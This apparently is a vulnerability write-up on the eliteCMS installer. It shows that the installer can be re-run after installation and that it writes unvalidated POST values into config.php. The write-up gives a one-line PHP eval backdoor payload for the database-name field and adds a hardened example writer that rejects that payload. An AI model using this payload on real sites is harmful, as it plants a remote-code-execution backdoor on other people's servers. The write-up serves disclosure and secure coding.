The eliteCMS installer is not locked once installation has finished, so an attacker can re-run the installation simply by visiting the installer's URL.
A second vulnerability is that the installer can be made to write a one-line PHP backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken straight from POST without any validation, and step 4 interpolates them directly into the generated PHP source.
If the database name POST data is set to:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
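As an added illustration of how a config writer like this should be built (example code, not eliteCMS's own), the following PHP checks an install lock before doing anything, validates the database settings against strict patterns, and emits every value through var_export() so that no input can break out of a string literal or the PHP tag. The function names, the lock-file name and the sample input are assumptions for the example.

```php
<?php
// Added example, not from the original post. All names here are hypothetical.

// Refuse to run the installer again once a lock file exists (the re-install issue).
function installer_is_locked(string $lockFile): bool {
    return file_exists($lockFile);
}

// Validate installer input before it gets anywhere near config.php.
// Host: letters, digits, dots, dashes, optional :port. Name/user: identifier characters only.
function validate_db_settings(array $in): array {
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_]{1,32}$/',
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $val = (string)($in[$key] ?? '');
        if (!preg_match($re, $val)) {
            throw new InvalidArgumentException("invalid $key");
        }
        $out[$key] = $val;
    }
    // A password may legitimately contain any character; it is never emitted raw (see below).
    $out['DB_PASS'] = (string)($in['DB_PASS'] ?? '');
    return $out;
}

// Emit config.php with each value as a PHP string literal. var_export() escapes quotes and
// backslashes, so a value such as "?><?php ... cannot close the literal or leave PHP mode.
function render_config(array $s): string {
    $php = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $php .= 'define(' . var_export($k, true) . ', ' . var_export($s[$k], true) . ");\n";
    }
    return $php;
}

// Constructed sample input using the payload from the post: it is rejected before any write.
$sample = ['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php eval($_POST[c]);?><?php',
           'DB_USER' => 'root', 'DB_PASS' => 'p@ss"word'];
if (!installer_is_locked(__DIR__ . '/install.lock')) {
    try {
        echo render_config(validate_db_settings($sample));
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";
    }
}
```

Even if the DB_NAME pattern were relaxed, var_export() keeps the generated file a pure set of define() calls; the lock check is what stops the installer being reached a second time at all.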